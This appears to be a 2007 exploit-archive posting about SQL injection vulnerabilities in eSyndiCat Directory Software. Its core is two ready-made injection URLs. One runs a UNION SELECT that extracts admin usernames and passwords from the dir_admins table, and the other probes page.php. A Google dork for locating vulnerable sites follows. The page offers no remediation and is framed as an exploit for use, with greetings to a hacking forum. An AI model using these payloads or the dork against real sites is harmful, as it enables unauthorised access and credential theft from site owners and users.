eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities
# Published : 2007-07-14
# Author : d3v1l
# Previous Title : CMScout <= 1.23 (index.php) Remote SQL Injection Vulnerability
# Next Title : Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility

[~] eSyndiCat: Multiple SQL Injection's
[~] 
[~] http://www.esyndicat.net/
[~] ----------------------------------------------------------
[~] Exploit coded and founded by d3v1l
[~] 
[~] Date: 14.07.2007
[~]
[~]
[~] stylers1@hotmail.it
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]  
[~] Security-Shell Members ( http://forum.security-shell.com )
[~]  
[~] Pentest | Gibon | Nocta | dr4g0n | deadfuneral | and str0ke
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
[~]    
[~] http://site.com/page.php?name=-1%27%20union%20select%200,0,0,0,0,0,0,0,0/* 
[~] 
[~]
[~]---------------------------------------------------------------------------------------------------------------
[~] Google Dork: ?? 2005-2006 Powered by eSyndiCat Directory Software   

# www.Syue.com [2007-07-14]